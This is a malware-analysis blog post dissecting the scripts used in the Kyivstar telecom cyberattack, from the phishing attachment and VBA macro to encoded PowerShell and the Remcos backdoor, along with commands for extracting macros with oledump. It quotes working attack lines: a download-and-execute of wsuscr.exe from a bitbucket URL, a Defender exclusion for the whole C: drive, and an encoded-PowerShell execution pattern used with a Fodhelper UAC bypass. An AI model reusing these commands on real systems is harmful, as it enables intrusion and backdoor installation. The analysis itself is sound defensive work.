Ky1vstar cyberattack - under the hood of the malicious scripts

MalBot · April 5, 2024, 12:25pm

The attack overview

In mid-December, it was revealed that a devastating cyberattack hit Ukr@ine's biggest telecommunications company. The attack disabled the company's services for days (!), leaving over twenty million Ukrainians without mobile communication and internet access.

Ukrainian officials described the attack as having disastrous consequences, causing the complete destruction of the telecoms operator's core infrastructure. The attackers managed to wipe out nearly all data, including thousands of virtual servers and PCs.

Below, you can see the attack chain, which begins with receiving a phishing email containing a malicious .zip attachment with a .doc file inside.

email => attach1.zip => attach1.rar + attach2.rar => attach.rar (password protected) => .doc (vba) => SMB \\89_23_98_22\LN\GB.exe => powershell bitbucket_org/.../wsuscr.exe

The .doc file merely shows a picture that prompts the potential victim to enable editing and content - in other words, to lower security settings and permit the execution of a malicious macro.

To evade anti-malware checks on the email server and victim's system, the doc file is packed into a multi-layered, password-protected archive. It contains a VBA macro that initiates the infection process by executing the malware downloader.

Below you can see the detailed (trimmed for clarity) execution flow.

As you can see, the attackers actively use cmd and PS scripts to initiate malicious actions from trusted processes. These scripts are either fully or partially encoded and may contain packed data. To run PS scripts from cmd, the following command construction is used.

powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('...')) | Invoke-Expression"

To evade detection, the PS script to be executed is base64 encoded. The batch file passes the encoded script to PowerShell, instructing it to decode it on-the-fly via the command line rather than saving the script to disk.

Exploring the scripts

After decompressing the final RAR archive, the victim opens the malicious .doc file containing a malicious VBA macro. We can extract it using two tools: Frank Boldewin's OfficeMalScanner and Didier Stevens' oledump. Let's take a look at both.

> OfficeMalScanner.exe C:\Test\malicious.doc info

This command dumps macros into the MALICIOUS.DOC-Macros folder. To obtain oledump, we need to install it using the "pip install olefile" command.

Next, dump the document structure.

We're interested in the streams marked with M, where macros are stored in a compressed state. The following command decompresses the macro locating in the 9th stream.

oledump.py -s 9 --vbadecompressskipattributes C:\Test\malicious.doc >C:\Test\s9_malicious_doc.txt

This macro, shown in the picture below, serves only one purpose: to download and run the malware downloader GB.exe from the SMB share. Before doing so, it also opens the shared folder in a new Explorer window and closes it after execution.

The process tree.

The downloader GB.exe drops the res.bat and executes commands from it.

:: Download test2.exe from the share to the local folder wo any messages

echo f | xcopy /s test2.exe "%temp%\persistent2\test2.exe" >NUL

:: Execute an encoded PS script

powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgAA==')) | Invoke-Expression"

This bat file copies another executable, test2.exe, from the share and executes an encoded PS script. The bypass commands within the script body are packed.

This PS script implements an interesting UAC bypass trick using Fodhelper binary in just three commands. Consequently, it executes the downloaded Remcos executable with elevated privileges. The unpacked cmd elevation commands appear as follows.

As we can see from the malware execution flow pic above, the downloader also runs another executable, test2.exe, in addition to executing res.bat.

> cmd.exe /c res.bat && test2.exe

This test2 executable runs another interesting batch file named test2.bat.

It runs another PS script designed to add the entire C drive to Defender's exclusion list, which requires admin rights. As usual, the commands are base64 encoded.

$pwd = "Add-MpPreference -ExclusionPath C:\"

$pwd | Invoke-Expression

This execution chain ends with the launch of Remcos dropper named wsuscr.exe from the aforementioned PS script.

wget "https://bitbucket.org/olegovich-007/777/downloads/wsuscr.exe" -outfile "$env:APPDATA\wsuscr.exe"

Invoke-Expression -Command "$env:APPDATA\wsuscr.exe"

Remcos serves as a backdoor, granting attackers full access to the compromised system.

References

https://cert.gov.ua/article/6276824

https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1

https://www.joesandbox.com/analysis/1365471/0/html

https://www.reuters.com/world/europe/russian-hackers-were-inside-ukraine-telecoms-giant-months-cyber-spy-chief-2024-01-04/

https://www.hybrid-analysis.com/sample/d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c/658988e479a329c125013938

https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Article Link: A blog about rootkits research and the Windows kernel: Ky1vstar cyberattack - under the hood of the malicious scripts